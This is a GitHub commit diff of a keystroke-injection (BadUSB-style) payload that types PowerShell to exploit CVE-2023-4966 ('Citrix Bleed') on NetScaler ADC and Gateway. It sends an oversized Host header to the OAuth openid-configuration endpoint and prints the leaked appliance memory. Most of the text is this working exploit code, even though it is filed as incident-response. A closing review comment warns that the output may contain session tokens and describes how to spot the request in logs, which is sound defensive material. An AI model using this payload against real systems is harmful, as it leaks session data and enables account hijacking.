Update win-payload.txt

pull/671/head
Aleff 2024-06-09 12:05:56 +02:00 committed by GitHub
parent 40e28fac9b
commit fd03dfda79
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 9 additions and 9 deletions


@ -3,7 +3,7 @@
* REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
* REM # Author : Aleff #
* REM # Version : 1.0 #
* REM # Category : incident-response #
* REM # Category : incident-response #
* REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
* REM # #
* REM ##################################################################################
@ -23,35 +23,35 @@ QUACK DELAY 1000
QUACK STRING $header_value = 'a' * 24576
QUACK ENTER
QUACK DELAY 500
QUACK STRING $header_value = $header_value -replace "\n", ""
QUACK STRING $header_value = $header_value -replace \"\n\", \"\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $headers="-H 'Host:$header_value'"
QUACK STRING $headers=\"-H 'Host:$header_value'\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $headers = @{'Host' = $header_value}
QUACK ENTER
QUACK DELAY 500
QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
QUACK STRING $uri = \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
QUACK ENTER
QUACK DELAY 500
QUACK STRING if ($response.Substring(0, 3) -eq "200") {
QUACK STRING if ($response.Substring(0, 3) -eq \"200\") {
QUACK ENTER
QUACK DELAY 500
QUACK STRING Write-Host "--- Dumped memory ---"
QUACK STRING Write-Host \"--- Dumped memory ---\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $response.Substring(131050) # 131051 - 1
QUACK ENTER
QUACK DELAY 500
QUACK STRING Write-Host "--- End ---"
QUACK STRING Write-Host \"--- End ---\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING } else {
QUACK ENTER
QUACK DELAY 500
QUACK STRING Write-Host "Could not dump memory"}
QUACK ENTER
QUACK STRING Write-Host \"Could not dump memory\"}
QUACK ENTER
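Review bot: The REM header in the first hunk is incomplete for a payload filed under `incident-response`: it does not say what the `--- Dumped memory ---` output in the second hunk contains or what a responder should do on a positive result, and `NetScaler ADV` in the Target line looks like a typo for ADC. Since the title names CVE-2023-4966, any bytes printed are appliance memory and may include session material, so the output should be captured into the case record and treated as sensitive rather than left in a console window. I would add a header line such as `REM # Note : output may hold session tokens; on a hit, patch the appliance and end active sessions #`. For detection, the request shape visible here (an oversized Host header on the `/oauth/idp/.well-known/openid-configuration` path) is what to search for in front-end or WAF logs, assuming those requests are logged. The header block starts above the lines shown in the first hunk.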